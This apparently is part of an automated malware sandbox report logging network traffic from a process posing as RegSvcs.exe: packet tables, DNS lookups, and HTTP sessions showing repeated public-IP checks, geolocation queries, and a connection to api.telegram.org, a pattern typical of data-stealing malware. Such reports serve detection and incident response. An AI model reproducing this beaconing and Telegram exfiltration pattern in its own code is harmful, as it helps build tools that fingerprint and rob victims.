Jan 10, 2025 18:55:35.950794935 CET	49784	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:35.951399088 CET	49798	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:35.956206083 CET	80	49798	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:35.956476927 CET	80	49784	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:35.956681967 CET	49784	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:35.956695080 CET	49798	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:35.956824064 CET	49798	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:35.961574078 CET	80	49798	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:37.655911922 CET	80	49798	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:37.657216072 CET	49811	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:37.657313108 CET	443	49811	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:37.657407045 CET	49811	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:37.657664061 CET	49811	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:37.657699108 CET	443	49811	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:37.706968069 CET	49798	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:38.200767040 CET	443	49811	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:38.202348948 CET	49811	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:38.202392101 CET	443	49811	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:38.376446009 CET	443	49811	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:38.376522064 CET	443	49811	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:38.376589060 CET	49811	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:38.376981020 CET	49811	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:38.380266905 CET	49798	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:38.381489038 CET	49815	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:38.385242939 CET	80	49798	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:38.385298967 CET	49798	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:38.386354923 CET	80	49815	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:38.386425972 CET	49815	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:38.386514902 CET	49815	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:38.391391039 CET	80	49815	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:40.525208950 CET	80	49815	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:40.526633024 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:40.526671886 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:40.526751995 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:40.527097940 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:40.527110100 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:40.566414118 CET	49815	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:41.014167070 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:41.015782118 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:41.015809059 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:41.138984919 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:41.139038086 CET	443	49829	104.21.112.1	192.168.2.5
Jan 10, 2025 18:55:41.139086008 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:41.139518023 CET	49829	443	192.168.2.5	104.21.112.1
Jan 10, 2025 18:55:41.291091919 CET	49815	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:41.296117067 CET	80	49815	193.122.6.168	192.168.2.5
Jan 10, 2025 18:55:41.296196938 CET	49815	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:41.299393892 CET	49835	443	192.168.2.5	149.154.167.220
Jan 10, 2025 18:55:41.299428940 CET	443	49835	149.154.167.220	192.168.2.5
Jan 10, 2025 18:55:41.299495935 CET	49835	443	192.168.2.5	149.154.167.220
Jan 10, 2025 18:55:41.299897909 CET	49835	443	192.168.2.5	149.154.167.220
Jan 10, 2025 18:55:41.299915075 CET	443	49835	149.154.167.220	192.168.2.5
Jan 10, 2025 18:55:42.054733038 CET	443	49835	149.154.167.220	192.168.2.5
Jan 10, 2025 18:55:42.054826975 CET	49835	443	192.168.2.5	149.154.167.220
Jan 10, 2025 18:55:42.065661907 CET	49835	443	192.168.2.5	149.154.167.220
Jan 10, 2025 18:55:42.065694094 CET	443	49835	149.154.167.220	192.168.2.5
Jan 10, 2025 18:55:42.066018105 CET	443	49835	149.154.167.220	192.168.2.5
Jan 10, 2025 18:55:42.067887068 CET	49835	443	192.168.2.5	149.154.167.220
Jan 10, 2025 18:55:42.111336946 CET	443	49835	149.154.167.220	192.168.2.5
Jan 10, 2025 18:55:42.311160088 CET	443	49835	149.154.167.220	192.168.2.5
Jan 10, 2025 18:55:42.311216116 CET	443	49835	149.154.167.220	192.168.2.5
Jan 10, 2025 18:55:42.311294079 CET	49835	443	192.168.2.5	149.154.167.220
Jan 10, 2025 18:55:42.327483892 CET	49835	443	192.168.2.5	149.154.167.220
Jan 10, 2025 18:55:54.100851059 CET	49720	80	192.168.2.5	193.122.6.168
Jan 10, 2025 18:55:56.873672009 CET	49711	80	192.168.2.5	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:55:08.652060032 CET	60304	53	192.168.2.5	1.1.1.1
Jan 10, 2025 18:55:08.659966946 CET	53	60304	1.1.1.1	192.168.2.5
Jan 10, 2025 18:55:18.294466019 CET	49799	53	192.168.2.5	1.1.1.1
Jan 10, 2025 18:55:18.302149057 CET	53	49799	1.1.1.1	192.168.2.5
Jan 10, 2025 18:55:41.291811943 CET	54371	53	192.168.2.5	1.1.1.1
Jan 10, 2025 18:55:41.298640013 CET	53	54371	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 18:55:08.652060032 CET	192.168.2.5	1.1.1.1	0x86a1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:18.294466019 CET	192.168.2.5	1.1.1.1	0x9cd9	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:41.291811943 CET	192.168.2.5	1.1.1.1	0x75c0	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 18:55:08.659966946 CET	1.1.1.1	192.168.2.5	0x86a1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:55:08.659966946 CET	1.1.1.1	192.168.2.5	0x86a1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:08.659966946 CET	1.1.1.1	192.168.2.5	0x86a1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:08.659966946 CET	1.1.1.1	192.168.2.5	0x86a1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:08.659966946 CET	1.1.1.1	192.168.2.5	0x86a1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:08.659966946 CET	1.1.1.1	192.168.2.5	0x86a1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:18.302149057 CET	1.1.1.1	192.168.2.5	0x9cd9	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:18.302149057 CET	1.1.1.1	192.168.2.5	0x9cd9	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:18.302149057 CET	1.1.1.1	192.168.2.5	0x9cd9	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:18.302149057 CET	1.1.1.1	192.168.2.5	0x9cd9	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:18.302149057 CET	1.1.1.1	192.168.2.5	0x9cd9	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:18.302149057 CET	1.1.1.1	192.168.2.5	0x9cd9	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:18.302149057 CET	1.1.1.1	192.168.2.5	0x9cd9	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:55:41.298640013 CET	1.1.1.1	192.168.2.5	0x75c0	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	193.122.6.168	80	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:08.672518969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:55:17.687822104 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 18:55:17.695811033 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 18:55:18.210283995 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 18:55:19.444232941 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 18:55:20.117927074 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	193.122.6.168	80	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:20.839225054 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 18:55:26.891052008 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49720	193.122.6.168	80	5552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:22.573586941 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:55:27.359663010 CET	682	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 10 Jan 2025 17:55:27 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49743	193.122.6.168	80	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:27.582850933 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:55:28.286345005 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49753	193.122.6.168	80	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:29.059907913 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:55:30.724973917 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49772	193.122.6.168	80	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:31.545586109 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:55:32.842113018 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49784	193.122.6.168	80	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:33.560673952 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:55:35.268125057 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49798	193.122.6.168	80	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:35.956824064 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:55:37.655911922 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49815	193.122.6.168	80	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:55:38.386514902 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:55:40.525208950 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 17:55:19 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846508 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xA7wZm3G%2FHBe4TMvFSiyPL1vxHklHGtNxUK2OcuHICgb82qaQ70XMvS201mvZcxYPxtdr7kcKN1sq111%2Fyjiuq29NMRJ1wymZK0BwNRg8O7swKgPExkWMliqT5waYJg9MXbMe%2FrR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe898d2d4a729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1984&rtt_var=992&sent=8&recv=9&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=83667&cwnd=169&unsent_bytes=0&cid=04f5e2d2ec128dd4&ts=344&x=0"
2025-01-10 17:55:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.21.112.1	443	5000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:55:20 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 17:55:20 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:55:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1846509 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X1reLivq3TZyNTAu7iXv447wnT%2BrEiTUEIsomZxVDmMgCrgAOo8Y6gAZ5PJUnQd78ZLIKF5FskYLpSM71cwu9RJG0rTJuzSL%2FrTIgDxxRhlY8j3XxgGD8qRHJ4t0fuZ%2FPjNj0CH3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe8996b86843b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1595&rtt_var=659&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1587819&cwnd=203&unsent_bytes=0&cid=6fcc145f6a1dcdff&ts=222&x=0"
